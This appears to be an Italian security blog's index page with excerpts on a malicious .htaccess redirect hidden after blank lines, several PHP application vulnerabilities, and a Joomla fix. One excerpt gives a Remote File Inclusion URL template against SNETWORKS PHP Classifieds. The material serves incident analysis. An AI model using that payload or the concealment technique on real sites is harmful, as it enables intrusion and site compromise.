In questi giorni, come dicevo nel precedente post, sto analizzando/studiando un tipo di hacking che consiste nel redirettare i visitatori che provengono da un Motore di Ricerca verso una pagina malevola contenente link a Trojan/Malware.
Tale file “.htaccess” nella sua semplicità risulta essere furbo poiché ragiona in due modi:
- Se non è presente alcun “.htaccess” ne crea uno all’insaputa dell’utente con il codice scritto dalla Riga 101 in poi così anche se viene aperto il file non viene visto il codice;
- Se invece esiste già un file “.htaccess” provvedere ad aggiungere 101 righe vuote in coda e successivamente il codice senza modificare quanto già presente. Lo scopo è sempre quello di evitare che l’utente si accorga dell’infezione nel caso apra il file. [...]
Continue reading...
In questi giorni sto lavorando ad un “caso” di hacking che sta infettando un discreto numero di persone e facendo i soliti controlli mi sono imbattuto in una serie di vulnerabilità che affliggono il famoso script di statistiche Php-Stats 0.1.9.2 (utilizzato anche in questo Blog).
[...]
Continue reading...
E’ stata pubblicata da poco (4/10/2008) una vulnerabilità scoperta nella versione 1.1.6 di Simple Machine Forum (o SMF) che permette di bypassare il Filtro che viene applicato al contenuto del post dando la possibilità di scrivere parole censurate, url di siti correttamente funzionanti e visibili, etc.
[...]
Continue reading...
Oggi facendo il mio lavoro sono incappato in un sito con installato lo script “SNETWORKS PHP CLASSIFIEDS” constatando che è vulnerabile a diversi tipi di hacking.
Avevo la necessità di testare alcune vulnerabilità per verificare se il sito che stavo analizzando era stato defacciato a causa di questo applicativo o se invece erano state utilizzate altre tecniche. Ne ho trovate diverse ma per ora vi scrivo la Remote File Inclusion utilizzata che, comunque, si trova facilmente cercando in Rete:
http://[Taget]/[Path]/config.inc.php?path_escape=<url che volete includere>?
[...]
Continue reading...
Oggi stavo sperimentando per lavoro il componente di Joomla chiamato “GCalendar” che consente di inserire in Home Page del proprio Cms il Calendario di Google (Google Calendar) e la gestione degli Eventi dello stesso.
Ho riscontrato che su alcuni Hosting (Aruba per esempio) quando si clicca su uno degli Eventi presenti alla voce “Prossimamente” va in errore mostrando una pagina simile alla seguente.
![[RAW FIX] Joomla Gcalendar Components](http://www.capn3m0.org/wp-content/uploads/2008/10/croppercapture10-300x60.jpg "Errore GCalendar")
Errore nella visualizzazione Eventi di Gcalendar per Joomla
[...]
Continue reading...
![[RAW FIX] Joomla Gcalendar Components](http://www.capn3m0.org/wp-content/uploads/2008/10/croppercapture10.jpg "Errore GCalendar")
![[WIN7/VISTA] – Soluzione Blue Screen nvlddmkm.sys – Nvidia Driver](http://www.capn3m0.org/wp-content/themes/freshnews/functions/thumb.php?src=wp-content/uploads/2009/10/bsod-150x150.png&w=35&h=35&zc=1&q=90){kind=small}
12 ottobre 2008
2 Comments